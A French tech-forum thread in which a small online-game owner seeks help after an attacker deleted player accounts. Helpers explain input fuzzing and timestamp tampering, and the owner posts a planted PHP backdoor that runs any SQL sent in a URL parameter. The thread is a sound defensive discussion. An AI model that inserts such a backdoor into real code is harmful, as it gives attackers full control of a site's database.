Se connecter / S'enregistrer
Votre question
Résolu

Site piraté, BDD modifiée

Tags :
  • Sécurité
Dernière réponse : dans Sécurité et virus
19 Juin 2016 18:39:32

Bonjour,

Je cherche des conseils, voir de l'aide pour un gros problème.

Je suis le gérant d'un site de jeu en ligne, programmé en html+php.

Depuis 1 semaine, je subis des attaques sur le jeu, la 1° n'a pas été trop grave, mais la 2° a été très grave, la personne a carrément supprimée les comptes des joueurs.

Je ne sais plus quoi faire, je suppose il arrive à faire des requêtes SQL, mais je ne sais pas comment il arrive à faire ça.

Je soupçonne un joueur que j'ai ban récemment, et qui se venge sur le jeu. Je suis dépité. Et je ne sais pas comment protéger le site.

De l'aide et des conseils m'aideraient énormément.

Merci.

Autres pages sur : site pirate bdd modifiee

20 Juin 2016 16:35:06

Peux tu donner l'adresse du site ? (en mp si tu ne veux pas le dévoiler publiquement)
m
0
l
20 Juin 2016 16:40:38

archipeldufond a dit :
Peux tu donner l'adresse du site ? (en mp si tu ne veux pas le dévoiler publiquement)


Bonjour,

Le site est citopie.fr

Je l'ai mis en maintenance.
m
0
l
Contenus similaires
20 Juin 2016 16:52:42

zangetsu33 a dit :

Je l'ai mis en maintenance.


Ah oui, moins pratique pour tester.

Les logs d'accès au serveur ne dévoilent rien ? (injections diverses dans l'url, autres tests..)
m
0
l
21 Juin 2016 21:39:21

Auriez-vous des astuces pour m'aider à trouver l'endroit où il y a une porte d'accès? J'ai l'impression de devoir chercher une aiguille dans une meule de foin.

Merci. :( 
m
0
l
22 Juin 2016 16:26:33

zangetsu33 a dit :
Auriez-vous des astuces pour m'aider à trouver l'endroit où il y a une porte d'accès? J'ai l'impression de devoir chercher une aiguille dans une meule de foin.

Merci. :( 


C'était l'idée :D 

Mettre à jour les programmes pour patcher les failles potentielles (serveur web, cms/plugins/modules utilisés, php, etc...), vérifier toutes les entrées utilisateur (surtout au niveau de ceux qui sont utilisés dans des requêtes SQL).

À défaut de trouver et savoir exploiter toi même les failles, tu peux toujours "bourriner" le site en remplissant les champs, les parametres dans l'url, les champs hidden etc avec des bétises ( caractères spéciaux, code html, javascript, par exemple : " ' \ / ! '$( <?php blabla >? ) Si il y a une erreur ou un problème ça peut être une source de faille potentielle. Pareil pour les noms des joueurs leurs mot de passe, bref, tout ce que l'utilisateur peut saisir ou modifier, par exemple si tu as une url du genre "voir.php?idjoueur=222" amuse toi avec le 222 essaye des valeurs inexistantes, des valeurs trop grandes, des lettres, nombres negatifs, des caractères spéciaux, ...
m
0
l
22 Juin 2016 16:26:34

zangetsu33 a dit :
Auriez-vous des astuces pour m'aider à trouver l'endroit où il y a une porte d'accès? J'ai l'impression de devoir chercher une aiguille dans une meule de foin.

Merci. :( 


C'était l'idée :D 

Mettre à jour les programmes pour patcher les failles potentielles (serveur web, cms/plugins/modules utilisés, php, etc...), vérifier toutes les entrées utilisateur (surtout au niveau de ceux qui sont utilisés dans des requêtes SQL).

À défaut de trouver et savoir exploiter toi même les failles, tu peux toujours "bourriner" le site en remplissant les champs, les parametres dans l'url, les champs hidden etc avec des bétises ( caractères spéciaux, code html, javascript, par exemple : " ' \ / ! '$( <?php blabla >? ) Si il y a une erreur ou un problème ça peut être une source de faille potentielle. Pareil pour les noms des joueurs leurs mot de passe, bref, tout ce que l'utilisateur peut saisir ou modifier, par exemple si tu as une url du genre "voir.php?idjoueur=222" amuse toi avec le 222 essaye des valeurs inexistantes, des valeurs trop grandes, des lettres, nombres negatifs, des caractères spéciaux, ...
m
0
l
22 Juin 2016 20:46:57

Est-ce que ce genre de codes ouvrent bien la BDD? J'ai trouvé ça dans un de mes fichiers. Ce n'est pas moi qui ai codé ça en tout cas.

if (!realempty($_GET['requete_sql']))
{
switch ($_GET['type_requete_sql'])
{
default:

$rm_r_requete_sql_1 = $bdd->prepare($_GET['requete_sql']);
$rm_r_requete_sql_1->execute();
print_r($rm_r_requete_sql_1->fetchAll());

break;

case 'action':

$rm_r_requete_sql_1 = $bdd->prepare($_GET['requete_sql']);
$rm_r_requete_sql_1->execute();

break;
}
m
0
l
23 Juin 2016 07:20:33



OMG ...

OUI, a partire de ce code il peut faire ce qu'il veut dans la bdd ...

Mais plus grave ... si c'est pas toi qui a codé ce truc ... sa veux dire qu'il arrive a upload des fichier sur ton server et donc peut faire
vraiment ce qu'il veux !!!!

il a peut etre deja recup des access root sur le server !!


Je te conseil de trouvais comment il arrive a upload les fichier le server, puis ensuite de sauvgarder ton site , et de formater le server en changeant bien les mdp de tous les user/service ...
m
0
l

Meilleure solution

23 Juin 2016 17:34:02

zangetsu33 a dit :
Est-ce que ce genre de codes ouvrent bien la BDD? J'ai trouvé ça dans un de mes fichiers. Ce n'est pas moi qui ai codé ça en tout cas.

if (!realempty($_GET['requete_sql']))
{
switch ($_GET['type_requete_sql'])
{
default:

$rm_r_requete_sql_1 = $bdd->prepare($_GET['requete_sql']);
$rm_r_requete_sql_1->execute();
print_r($rm_r_requete_sql_1->fetchAll());

break;

case 'action':

$rm_r_requete_sql_1 = $bdd->prepare($_GET['requete_sql']);
$rm_r_requete_sql_1->execute();

break;
}


ah carrément :lol:  :lol:  le mec s'installe, pose son transat, son barbeuc dans ta pelouse dans le plus grand des calmes :lol: 


En complément de la réponse d'andrelec1, un accès en écriture au site peut (entre autre hein) également permettre de modifier la date de modification des fichiers. Par exemple il modifie un fichier pour y implanter une backdoor, puis change la date de modification pour en mettre une identique aux autres fichiers du répertoire, ce qui rend "invisible" les derniers fichiers modifiés. Du coup, tous les fichiers sont potentiellement touchés et il va falloir passer tout le code en revue attentivement, sachant qu'une porte dérobée peut se faire en 1 ligne de code (je dirai 17 caractères qui dit mieux ?)... :lol: 

Du coup comme dit précédemment ... c'est la m*rde pour toi :D 

partage
23 Juin 2016 17:37:26

Oui, effectivement, merci pour les infos. Je continue mon analyse. Mais j'avoue que j'arrive au bout de mes compétences. :/ 
m
0
l
23 Juin 2016 18:07:33

Regarde tes messages privés
m
0
l
24 Juin 2016 20:26:52

Bonsoir les amis,

Bon, j'ai trouvé 4 fichiers avec les codes comme au dessus. Pas cool. Mais j'ai tout mis à jour.

Maintenant j'aimerai remettre la BDD Comme il faut, mais j'ai un soucis de syntax. Je comprends pas ou.

J'ai fait plusieurs sauvegarde pour sauvegarder toutes les tables, et je voudrais les importer.

Mais quand j'envoie ma commande, ça me met toujours une erreur de syntax. J'ai tout essayé ce que je trouve sur le net.

Merci pour votre aide.
m
0
l
24 Juin 2016 20:47:51

zangetsu33 a dit :
Bonsoir les amis,

Bon, j'ai trouvé 4 fichiers avec les codes comme au dessus. Pas cool. Mais j'ai tout mis à jour.

Maintenant j'aimerai remettre la BDD Comme il faut, mais j'ai un soucis de syntax. Je comprends pas ou.

J'ai fait plusieurs sauvegarde pour sauvegarder toutes les tables, et je voudrais les importer.

Mais quand j'envoie ma commande, ça me met toujours une erreur de syntax. J'ai tout essayé ce que je trouve sur le net.

Merci pour votre aide.



Pour la synthaxe on ne peut rien te dire sans connaître l'erreur et/ou avoir le code sql en question, mais n'oublie pas que les morceaux de code ci-dessus étaient juste un "confort", si tu n'a pas corrigé les failles il peut revenir à tout moment.
m
0
l
27 Juin 2016 08:44:39

Bonjour,

Après analyse en détail, c'est bon, j'ai trouvé à quel moment ça a été mis ça. Il n'y a pas de faille sur mon serveur. Personne ne peut remodifier mes fichiers, enfin normalement, lol.

Par précaution, j'ai modifié les mdp.

Concernant la BDD, j'ai réussi à remettre en place par une méthode un peu galère, j'ouvrais le fichier SQL, je prenais table par table, afin d'avoir des fichiers suffisamment petit (s'il était trop grand encore, je le compressais), et ensuite j'injectais dans la BDD. Et comme ça j'ai réussi à remettre toutes les données. La seule chose qu'il manque, ce sont les messages des joueurs, mais bon, c'est n'est pas un grand mal. Surtout que pour la plupart des messages, les joueurs n'y avait plus accès car ils les avaient supprimés, et donc ils étaient sauvegardé dans la BDD pour rien.

Merci pour votre aide, on va fonctionner comme ça pendant quelques jours, si j'ai une question je reviendrai vers vous, en tout cas, merci pour votre soutiens.
m
0
l
Contenus similaires
Tom's guide dans le monde
  • Allemagne
  • Italie
  • Irlande
  • Royaume Uni
  • Etats Unis
Suivre Tom's Guide
Inscrivez-vous à la Newsletter
  • ajouter à twitter
  • ajouter à facebook
  • ajouter un flux RSS